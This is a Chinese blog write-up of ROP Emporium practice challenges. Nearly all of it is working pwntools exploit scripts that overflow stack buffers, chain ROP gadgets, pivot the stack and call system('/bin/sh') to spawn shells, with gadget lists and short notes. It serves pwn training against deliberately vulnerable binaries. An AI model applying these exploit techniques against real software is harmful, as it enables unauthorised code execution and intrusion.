偶然间看到一个专门训练rop操作的网站,虽然题目难度不算很大,但是也学到了很多新的有关rop的操作,同时也是靠这些题目找回了学习pwn的状态
题目官网:https://ropemporium.com/
网上某大神的wp:http://www.giantbranch.cn/2017/12/18/rop%20emporium%20challenges%20wp/
1.ret2win
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process("./ret2win")
binsh = 0x400811
payload = 'a'*(0x20+0x08) +p64(binsh)
p.sendline(payload)
p.interactive()
2.ret2win32
#!/usr/bin/python
#coding:utf-8
from pwn import *
p = process("./ret2win32")
ret2win = 0x08048659
payload = 'a'*(0x28+0x04) +p32(ret2win)
#\x59\x86\x04\x08
#print p32(ret2win)
p.sendline(payload)
p.interactive()
3.split
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./split')
catflag = 0x601060
system = 0x4005e0
pop_rdi_ret = 0x400883
payload = 'a'*(0x20 + 0x08) + p64(pop_rdi_ret) +p64(catflag)+p64(system)
p.sendline(payload)
p.interactive()
4. split32
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./split32')
catflag = 0x0804a030
system = 0x08048430
payload = 'a'*(0x28+0x04) +p32(system)+'aaaa'+p32(catflag)
p.sendline(payload)
p.interactive()
5.callme
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./callme')
elf = ELF('./callme')
pop_rdi_ret = 0x00401b23
pop_rsi_rdx_ret = 0x401ab1
callone = 0x401850
calltwo = 0x401870
callthree = 0x401810
payload = 'a'*(0x20 + 0x08)
payload += p64(pop_rdi_ret) + p64(1)+ p64(pop_rsi_rdx_ret)+p64(2)+p64(3)+p64(callone)
payload += p64(pop_rdi_ret) + p64(1)+ p64(pop_rsi_rdx_ret)+p64(2)+p64(3)+p64(calltwo)
payload += p64(pop_rdi_ret) + p64(1)+ p64(pop_rsi_rdx_ret)+p64(2)+p64(3)+p64(callthree)
p.sendline(payload)
p.interactive()
6.callme32
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./callme32')
pop_esi_edi_ebp_ret = 0x080488a9
callone = 0x080485c0
calltwo = 0x08048620
callthree = 0x080485b0
main = 0x0804873b
payload = 'a'*(0x28 + 0x04)
payload += p32(callone)+p32(pop_esi_edi_ebp_ret)+p32(1)+p32(2)+p32(3)
payload += p32(calltwo)+p32(pop_esi_edi_ebp_ret)+p32(1)+p32(2)+p32(3)
payload += p32(callthree)+p32(0xdeadbeef)+p32(1)+p32(2)+p32(3)
p.sendline(payload)
p.interactive()
7.write4
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./write4')
pop_rdi_ret = 0x400893
mov_r15_2_r14_ret = 0x400820
pop_r14_r15_ret= 0x400890
bss = 0x601060
binsh = '/bin/sh\x00'#sh\x00\x00\x00\x00\x00\x00也可以,只要在八字节内就行
system = 0x4005e0
payload = 'a'*(0x20+0x08)
payload += p64(pop_r14_r15_ret) + p64(bss) +binsh
payload += p64(mov_r15_2_r14_ret)
payload += p64(pop_rdi_ret) + p64(bss) +p64(system)
p.sendline(payload)
p.interactive()
8.write432
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./write432')
mov_edi_ebp_ret = 0x08048670
pop_edi_ebp_ret = 0x080486da
bss = 0x0804a040
binsh = 'sh\x00\x00' #32位程序仅有四个字节可以写入,所以只能构造system(sh)
system = 0x08048430
payload = 'a'*(0x28+0x04)
payload += p32(pop_edi_ebp_ret)+p32(bss)+binsh
payload += p32(mov_edi_ebp_ret)
payload += p32(system)+p32(0xdeadbeef)+p32(bss)
p.sendline(payload)
p.interactive()
9.badchars
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process("./badchars")
system = 0x4006f0
bss = 0x601080
binsh = '/bin/sh\x00'
pop_r12_r13_ret = 0x0000000000400b3b
mov_r13_r12_ret = 0x0000000000400b34
pop_r14_r15_ret = 0x0000000000400b40
xor_r15_r14_ret = 0x0000000000400b30
pop_rdi_ret=0x0000000000400b39
'''
badchar = [98, 105, 99, 47, 32, 102, 110, 115]
xornum = 1
while 1:
for x in binsh:
tmp = ord(x) ^ xornum
if tmp in badchar:
xornum += 1
break
if x == "\x00":
print xornum
xornum +=1
#2,3,5,9
if xornum == 10:
break
'''
xorbinsh = ''
for x in binsh:
xorbinsh += chr(ord(x) ^ 10)
#print xorbinsh
payload = 'a'*(0x20+0x08)
payload += p64(pop_r12_r13_ret) + xorbinsh + p64(bss)
payload += p64(mov_r13_r12_ret)
for x in xrange(0,len(xorbinsh)):
payload += p64(pop_r14_r15_ret)
payload += p64(10)
payload += p64(bss + x)
payload += p64(xor_r15_r14_ret)
payload += p64(pop_rdi_ret)
payload += p64(bss)
payload += p64(system)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
10.badchars32
#!python
#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process("./badchars32")
mov_edi_esi_ret = 0x08048893
pop_esi_edi_ret = 0x08048899
pop_ebx_ecx_ret = 0x08048896
xor_ebx_ecl_ret = 0x08048890
system = 0x080484E0
bss = 0x0804a040
binsh = '/bin/sh\x00'
badchar = [98, 105, 99, 47, 32, 102, 110, 115]
xornum = 1
while 1:
for x in binsh:
tmp = ord(x) ^ xornum
if tmp in badchar:
xornum += 1
break
if x == "\x00":
print xornum
xornum +=1
#2,3,5,9
if xornum == 10:
break
xorbinsh = ''
for x in binsh:
xorbinsh += chr(ord(x) ^ 2)
#print xorbinsh
payload = 'a'*(0x28+0x04)
payload += p32(pop_esi_edi_ret)
payload += xorbinsh[0:4] +p32(bss)
payload += p32(mov_edi_esi_ret)
#需要注意的是32位的程序一次只能传4个字节的字符串,因此xorbinsh需要分两次来发送到bss段里面
payload += p32(pop_esi_edi_ret)
payload += xorbinsh[4:8] +p32(bss+4)
payload += p32(mov_edi_esi_ret)
for x in xrange(0,len(xorbinsh)):
payload += p32(pop_ebx_ecx_ret)
payload += p32(bss+x) + p32(2)
payload += p32(xor_ebx_ecl_ret)
payload += p32(system) +p32(0xdeadbeef)+p32(bss)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
11.fluff
这道题有个比较有趣的地方在于,可以用xor寄存器进行写入操作,用一个xor自己清空寄存器A,接着让寄存器B去xor寄存器A,把结果存在寄存器B,就相当于把B赋值給A
#!python
#coding:utf-8
from pwn import *
context.log_level = "debug"
p = process("./fluff")
system = 0x4005e0
bss = 0x601060
binsh = '/bin/sh\x00'
junk = 'a'*8
gadget1 = 0x40084d
#pop rdi ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
gadget2 = 0x400822
#xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
gadget3 = 0x40082f
#xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
gadget4 = 0x400840
#xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
gadget5 = 0x400832
#pop r12 ; mov r13d, 0x604060 ; ret
payload = 'a'*(0x20+0x08)
payload += p64(gadget5)
payload += p64(bss)
payload += p64(gadget2) +junk
payload += p64(gadget3) +junk
payload += p64(gadget4) +junk
payload += p64(gadget5)
payload += binsh
payload += p64(gadget2) +junk
payload += p64(gadget3) +junk
payload += p64(gadget1) +p64(bss)+junk +p64(0)
payload += p64(system)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
'''
这道题的关键点在于非常巧妙地利用了几个gadget,尤其是通过xor进行寄存器赋值的操作是真的很细节
0x000000000040084d : pop rdi ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x000000000040084c : pop r15 ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
'''
12.fluff32
#!python
#coding:utf-8
from pwn import *
context.log_level = "debug"
p = process("./fluff32")
bss = 0x0804a040
binsh = "/bin/sh\x00"
system = 0x08048430
junk = "a"*4
gadget1 = 0x08048693
#mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
gadget2 = 0x08048671
#xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
gadget3 = 0x0804867b
#xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
gadget4 = 0x080483e1
# pop ebx ; ret
gadget5 = 0x08048689
#xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
payload = 'a'*(0x28+0x04)
#把bss的地址传给ecx
payload += p32(gadget4)
payload += p32(bss)
payload += p32(gadget2)+junk
payload += p32(gadget3)+junk
payload += p32(gadget5)+junk
#把binsh前四个字节写入bss的地址
payload += p32(gadget4)
payload += binsh[0:4]
payload += p32(gadget2)+junk
payload += p32(gadget3)+junk
payload += p32(gadget1)+junk+p32(0)
#把bss+4的地址传给ecx
payload += p32(gadget4)
payload += p32(bss+4)
payload += p32(gadget2)+junk
payload += p32(gadget3)+junk
payload += p32(gadget5)+junk
#把binsh后四个字节写入bss+4的地址
payload += p32(gadget4)
payload += binsh[4:8]
payload += p32(gadget2)+junk
payload += p32(gadget3)+junk
payload += p32(gadget1)+junk+p32(0)
#此时在bss段中已经写好了/bin/sh,然后就调用system函数getshell
payload += p32(system) +p32(0xdeadbeef)+p32(bss)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
'''
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x080483e1 : pop ebx ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
'''
13.pivot
这道题有两次输入,第一次输入存入pivot堆的位置,第二次输入存入栈的位置,第二次输入的可溢出大小明显不够用来构造rop链,所以需要用到栈迁移的操作,然后就是一些rop的巧妙构造了,其次这道题有给出so文件,很明显就是要利用这个foothold函数来进行泄漏ret2win的真实地址,然后去调用这个ret2win函数
找gadget的确是一件很麻烦的事情,但其实text段里面有提示
很明显这个就是一个有用的gadget,剩下的就以这个为线索去找就行了
exp如下:
#!python
#coding:utf-8
from pwn import *
context.log_level = "debug"
elf = ELF("./pivot")
libc = ELF("./libpivot.so")
p = process("./pivot")
plt_foothold_function = elf.plt["foothold_function"]
got_foothold_function = elf.got["foothold_function"]
libc_foothold_function = libc.symbols["foothold_function"]
libc_ret2win = libc.symbols["ret2win"]
offset = libc_ret2win-libc_foothold_function
mov_rax_rax = 0x0000000000400b05
pop_rax = 0x0000000000400b00
call_rax =0x000000000040098e
add_rax_rbp = 0x0000000000400b09
pop_rbp = 0x0000000000400900
xchg_rax_rsp = 0x0000000000400b02
p.recvuntil("The Old Gods kindly bestow upon you a place to pivot: ")
heap = int(p.recv(14),16)
p.recvuntil("> ")
payload1 = p64(plt_foothold_function)
payload1 += p64(pop_rax)
payload1 += p64(got_foothold_function)
payload1 += p64(mov_rax_rax)
payload1 += p64(pop_rbp)
payload1 += p64(offset)
payload1 += p64(add_rax_rbp)
payload1 += p64(call_rax)
p.sendline(payload1)
p.recvuntil("> ")
payload2 ='a'*(0x20+0x08)
payload2 += p64(pop_rax)
payload2 += p64(heap)
payload2 += p64(xchg_rax_rsp)
p.sendline(payload2)
p.recvuntil("into libpivot.so")
p.interactive()
'''
输入命令 ROPgadget --binary ./pivot --depth 20 配合着--only"xxx"和grep命令去找出这些有用的gadget
0x0000000000400b05 : mov rax, qword ptr [rax] ; ret
0x0000000000400b00 : pop rax ; ret
0x000000000040098e : call rax
0x0000000000400b09 : add rax, rbp ; ret
0x0000000000400900 : pop rbp ; ret
0x0000000000400b02 : xchg rax, rsp ; ret
'''
14.pivot32
原理同上,不多说了,直接贴上exp:
#!python
#coding:utf-8
from pwn import *
context.log_level = "debug"
elf = ELF("./pivot32")
libc = ELF("./libpivot32.so")
p = process("./pivot32")
plt_foothold_function = elf.plt["foothold_function"]
got_foothold_function = elf.got["foothold_function"]
libc_foothold_function = libc.symbols["foothold_function"]
libc_ret2win = libc.symbols["ret2win"]
offset = libc_ret2win-libc_foothold_function
print offset
mov_eax_eax = 0x080488c4
pop_eax = 0x080488c0
call_eax =0x080486a3
add_eax_ebx = 0x080488c7
pop_ebx = 0x08048571
xchg_eax_esp = 0x080488c2
p.recvuntil("The Old Gods kindly bestow upon you a place to pivot: ")
heap = int(p.recv(10),16)
p.recvuntil("> ")
payload1 = p32(plt_foothold_function)
payload1 += p32(pop_eax)
payload1 += p32(got_foothold_function)
payload1 += p32(mov_eax_eax)
payload1 += p32(pop_ebx)
payload1 += p32(offset)
payload1 += p32(add_eax_ebx)
payload1 += p32(call_eax)
p.sendline(payload1)
p.recvuntil("> ")
payload2 ='a'*(0x28+0x04)
payload2 += p32(pop_eax)
payload2 += p32(heap)
payload2 += p32(xchg_eax_esp)
p.sendline(payload2)
p.recvuntil("into libpivot.so")
p.interactive()
'''
0x080488c0 : pop eax ; ret
0x08048571 : pop ebx ; ret
0x080488c2 : xchg eax, esp ; ret
0x080488c4 : mov eax, dword ptr [eax] ; ret
0x080486a3 : call eax
0x080488c7 : add eax, ebx ; ret
其实栈翻转我们一般用leave;ret,上面64位有0x0a,所以用不了
上面的stack pivot可以用如下payload:
leave_ret = 0x080486a8
p.recvuntil("> ")
payload = "a" * 40
payload += p32(heap_addr - 4)
#因为后面的leave会pop ebp,所以这减4
payload += p32(leave_ret)
'''
网友评论